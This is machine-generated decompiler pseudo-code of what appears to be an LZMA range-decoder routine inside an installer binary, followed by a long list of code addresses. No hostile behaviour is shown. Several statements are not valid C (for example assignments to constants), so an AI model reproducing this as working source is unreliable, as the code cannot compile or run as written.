											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__ebx = __edx + 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__ebx = __edx + 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                                      0x00000000
                                                                      0x00406be3
                                                                      0x00406be3
                                                                      0x00406be7
                                                                      0x00406c10
                                                                      0x00406c1a
                                                                      0x00406be9
                                                                      0x00406bf2
                                                                      0x00406bff
                                                                      0x00406c02
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00406f49
                                                                      0x00406f49
                                                                      0x00406f49
                                                                      0x00406f4f
                                                                      0x00406f55
                                                                      0x00406f5b
                                                                      0x00406f75
                                                                      0x00406f78
                                                                      0x00406f7e
                                                                      0x00406f89
                                                                      0x00406f8b
                                                                      0x00406f5d
                                                                      0x00406f5d
                                                                      0x00406f6c
                                                                      0x00406f70
                                                                      0x00406f70
                                                                      0x00406f95
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f97
                                                                      0x00406f9b
                                                                      0x0040714a
                                                                      0x00407160
                                                                      0x00407168
                                                                      0x0040716f
                                                                      0x00407171
                                                                      0x00407178
                                                                      0x0040717c
                                                                      0x0040717c
                                                                      0x00406fa7
                                                                      0x00406fae
                                                                      0x00406fb6
                                                                      0x00406fb9
                                                                      0x00406fbc
                                                                      0x00406fbc
                                                                      0x00406fc2
                                                                      0x00406fc2
                                                                      0x0040675e
                                                                      0x0040675e
                                                                      0x0040675e
                                                                      0x00406767
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040676d
                                                                      0x00000000
                                                                      0x00406778
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406781
                                                                      0x00406784
                                                                      0x00406787
                                                                      0x0040678b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406791
                                                                      0x00406794
                                                                      0x00406796
                                                                      0x00406797
                                                                      0x0040679a
                                                                      0x0040679c
                                                                      0x0040679d
                                                                      0x0040679f
                                                                      0x004067a2
                                                                      0x004067a7
                                                                      0x004067ac
                                                                      0x004067b5
                                                                      0x004067c8
                                                                      0x004067cb
                                                                      0x004067d7
                                                                      0x004067ff
                                                                      0x00406801
                                                                      0x0040680f
                                                                      0x0040680f
                                                                      0x00406813
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406803
                                                                      0x00406803
                                                                      0x00406806
                                                                      0x00406807
                                                                      0x00406807
                                                                      0x00000000
                                                                      0x00406803
                                                                      0x004067dd
                                                                      0x004067e2
                                                                      0x004067e2
                                                                      0x004067eb
                                                                      0x004067f3
                                                                      0x004067f6
                                                                      0x00000000
                                                                      0x004067fc
                                                                      0x004067fc
                                                                      0x00000000
                                                                      0x004067fc
                                                                      0x00000000
                                                                      0x00406819
                                                                      0x00406819
                                                                      0x0040681d
                                                                      0x004070c9
                                                                      0x00000000
                                                                      0x004070c9
                                                                      0x00406826
                                                                      0x00406836
                                                                      0x00406839
                                                                      0x0040683c
                                                                      0x0040683c
                                                                      0x0040683c
                                                                      0x0040683f
                                                                      0x00406843
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406845
                                                                      0x0040684b
                                                                      0x00406875
                                                                      0x0040687b
                                                                      0x00406882
                                                                      0x00000000
                                                                      0x00406882
                                                                      0x00406851
                                                                      0x00406854
                                                                      0x00406859
                                                                      0x00406859
                                                                      0x00406864
                                                                      0x0040686c
                                                                      0x0040686f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068b4
                                                                      0x004068ba
                                                                      0x004068bd
                                                                      0x004068ca
                                                                      0x004068d2
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406889
                                                                      0x00406889
                                                                      0x0040688d
                                                                      0x004070d8
                                                                      0x00000000
                                                                      0x004070d8
                                                                      0x00406899
                                                                      0x004068a4
                                                                      0x004068a4
                                                                      0x004068a4
                                                                      0x004068a7
                                                                      0x004068aa
                                                                      0x004068ad
                                                                      0x004068b2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f49
                                                                      0x00406f49
                                                                      0x00406f4f
                                                                      0x00406f55
                                                                      0x00406f5b
                                                                      0x00406f75
                                                                      0x00406f78
                                                                      0x00406f7e
                                                                      0x00406f89
                                                                      0x00406f8b
                                                                      0x00406f5d
                                                                      0x00406f5d
                                                                      0x00406f6c
                                                                      0x00406f70
                                                                      0x00406f70
                                                                      0x00406f95
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068da
                                                                      0x004068dc
                                                                      0x004068df
                                                                      0x00406950
                                                                      0x00406953
                                                                      0x00406956
                                                                      0x0040695d
                                                                      0x00406967
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x004068e1
                                                                      0x004068e5
                                                                      0x004068e8
                                                                      0x004068ea
                                                                      0x004068ed
                                                                      0x004068f0
                                                                      0x004068f2
                                                                      0x004068f5
                                                                      0x004068f7
                                                                      0x004068fc
                                                                      0x004068ff
                                                                      0x00406902
                                                                      0x00406906
                                                                      0x0040690d
                                                                      0x00406910
                                                                      0x00406917
                                                                      0x0040691b
                                                                      0x00406923
                                                                      0x00406923
                                                                      0x00406923
                                                                      0x0040691d
                                                                      0x0040691d
                                                                      0x0040691d
                                                                      0x00406912
                                                                      0x00406912
                                                                      0x00406912
                                                                      0x00406927
                                                                      0x0040692a
                                                                      0x00406948
                                                                      0x0040694a
                                                                      0x00000000
                                                                      0x0040692c
                                                                      0x0040692c
                                                                      0x0040692f
                                                                      0x00406932
                                                                      0x00406935
                                                                      0x00406937
                                                                      0x00406937
                                                                      0x00406937
                                                                      0x0040693a
                                                                      0x0040693d
                                                                      0x0040693f
                                                                      0x00406940
                                                                      0x00406943
                                                                      0x00000000
                                                                      0x00406943
                                                                      0x00000000
                                                                      0x00406b79
                                                                      0x00406b7d
                                                                      0x00406b9b
                                                                      0x00406b9e
                                                                      0x00406ba5
                                                                      0x00406ba8
                                                                      0x00406bab
                                                                      0x00406bae
                                                                      0x00406bb1
                                                                      0x00406bb4
                                                                      0x00406bb6
                                                                      0x00406bbd
                                                                      0x00406bbe
                                                                      0x00406bc0
                                                                      0x00406bc3
                                                                      0x00406bc6
                                                                      0x00406bc9
                                                                      0x00406bc9
                                                                      0x00406bce
                                                                      0x00000000
                                                                      0x00406bce
                                                                      0x00406b7f
                                                                      0x00406b82
                                                                      0x00406b85
                                                                      0x00406b8f
                                                                      0x00406f46
                                                                      0x00406f46
